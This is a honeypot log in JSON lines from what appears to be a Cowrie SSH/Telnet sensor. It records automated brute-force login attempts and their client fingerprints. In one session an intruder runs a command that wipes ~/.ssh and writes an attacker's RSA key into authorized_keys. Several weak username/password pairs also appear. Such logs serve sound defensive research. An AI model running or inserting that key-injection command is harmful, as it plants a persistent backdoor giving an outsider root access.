{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:26:21.656800Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:26:21.657622Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:26:21.658819Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:21.870938Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:26:22.350508Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.351323Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.564178Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.565197Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":45030,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9632cdb9c67","protocol":"ssh","message":"New connection: 150.5.129.10:45030 (1.2.3.4:22) [session: b9632cdb9c67]","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.769277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.769981Z","src_ip":"150.5.129.10","session":"b9632cdb9c67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:26:22.975404Z","src_ip":"150.5.129.10","session":"b9632cdb9c67"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:26:23.838069Z","src_ip":"150.5.129.10","session":"b9632cdb9c67"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:25.046393Z","src_ip":"150.5.129.10","session":"b9632cdb9c67"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":45594,"dst_ip":"1.2.3.4","dst_port":22,"session":"f460968e9174","protocol":"ssh","message":"New connection: 150.5.129.10:45594 (1.2.3.4:22) [session: f460968e9174]","sensor":"my-vps","timestamp":"2025-08-31T01:26:25.249121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:26:25.250026Z","src_ip":"150.5.129.10","session":"f460968e9174"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:26:25.453654Z","src_ip":"150.5.129.10","session":"f460968e9174"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:26:26.309202Z","src_ip":"150.5.129.10","session":"f460968e9174"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:26.512661Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:26.513809Z","src_ip":"150.5.129.10","session":"f460968e9174"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33156,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cdf7debda2d","protocol":"ssh","message":"New connection: 212.227.125.160:33156 (1.2.3.4:22) [session: 6cdf7debda2d]","sensor":"my-vps","timestamp":"2025-08-31T01:26:33.866044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:26:34.473824Z","src_ip":"212.227.125.160","session":"6cdf7debda2d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:26:34.474899Z","src_ip":"212.227.125.160","session":"6cdf7debda2d"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345678","message":"login attempt [developer/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:26:37.317936Z","src_ip":"212.227.125.160","session":"6cdf7debda2d"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:38.763061Z","src_ip":"212.227.125.160","session":"6cdf7debda2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47127,"dst_ip":"1.2.3.4","dst_port":23,"session":"16e1839af7d1","protocol":"telnet","message":"New connection: 212.227.125.160:47127 (1.2.3.4:23) [session: 16e1839af7d1]","sensor":"my-vps","timestamp":"2025-08-31T01:27:01.625896Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47129,"dst_ip":"1.2.3.4","dst_port":23,"session":"775d2ee86d61","protocol":"telnet","message":"New connection: 212.227.125.160:47129 (1.2.3.4:23) [session: 775d2ee86d61]","sensor":"my-vps","timestamp":"2025-08-31T01:27:01.627323Z"}
{"eventid":"cowrie.session.connect","src_ip":"154.219.111.53","src_port":50530,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb34f01c6b84","protocol":"ssh","message":"New connection: 154.219.111.53:50530 (1.2.3.4:22) [session: cb34f01c6b84]","sensor":"my-vps","timestamp":"2025-08-31T01:27:05.030397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:27:05.031421Z","src_ip":"154.219.111.53","session":"cb34f01c6b84"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T01:27:05.294597Z","src_ip":"154.219.111.53","session":"cb34f01c6b84"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":42470,"dst_ip":"1.2.3.4","dst_port":22,"session":"947378cd98d7","protocol":"ssh","message":"New connection: 115.190.94.119:42470 (1.2.3.4:22) [session: 947378cd98d7]","sensor":"my-vps","timestamp":"2025-08-31T01:27:08.663993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:27:08.664818Z","src_ip":"115.190.94.119","session":"947378cd98d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:27:08.882859Z","src_ip":"115.190.94.119","session":"947378cd98d7"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":49886,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e2e25cbc4a9","protocol":"ssh","message":"New connection: 102.88.137.80:49886 (1.2.3.4:22) [session: 0e2e25cbc4a9]","sensor":"my-vps","timestamp":"2025-08-31T01:27:09.551096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:27:09.552087Z","src_ip":"102.88.137.80","session":"0e2e25cbc4a9"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:27:09.674881Z","src_ip":"102.88.137.80","session":"0e2e25cbc4a9"}
{"eventid":"cowrie.login.failed","username":"sinusbot","password":"123456","message":"login attempt [sinusbot/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:27:10.205779Z","src_ip":"102.88.137.80","session":"0e2e25cbc4a9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:11.331574Z","src_ip":"102.88.137.80","session":"0e2e25cbc4a9"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:13.030751Z","src_ip":"154.219.111.53","session":"cb34f01c6b84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52860,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e80a4e923b2","protocol":"ssh","message":"New connection: 212.227.235.229:52860 (1.2.3.4:22) [session: 4e80a4e923b2]","sensor":"my-vps","timestamp":"2025-08-31T01:27:15.076320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:27:16.179125Z","src_ip":"212.227.235.229","session":"4e80a4e923b2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:27:16.179843Z","src_ip":"212.227.235.229","session":"4e80a4e923b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62923,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44184811555","protocol":"ssh","message":"New connection: 212.227.235.229:62923 (1.2.3.4:22) [session: b44184811555]","sensor":"my-vps","timestamp":"2025-08-31T01:27:17.493773Z"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456789","message":"login attempt [developer/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:27:22.023797Z","src_ip":"212.227.235.229","session":"4e80a4e923b2"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:27:23.983358Z","src_ip":"212.227.235.229","session":"4e80a4e923b2"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.233","src_port":55216,"dst_ip":"1.2.3.4","dst_port":22,"session":"836b58ec3fcf","protocol":"ssh","message":"New connection: 185.156.73.233:55216 (1.2.3.4:22) [session: 836b58ec3fcf]","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.017496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.018266Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.039166Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:27:26.142075Z","src_ip":"185.156.73.233","session":"836b58ec3fcf"}
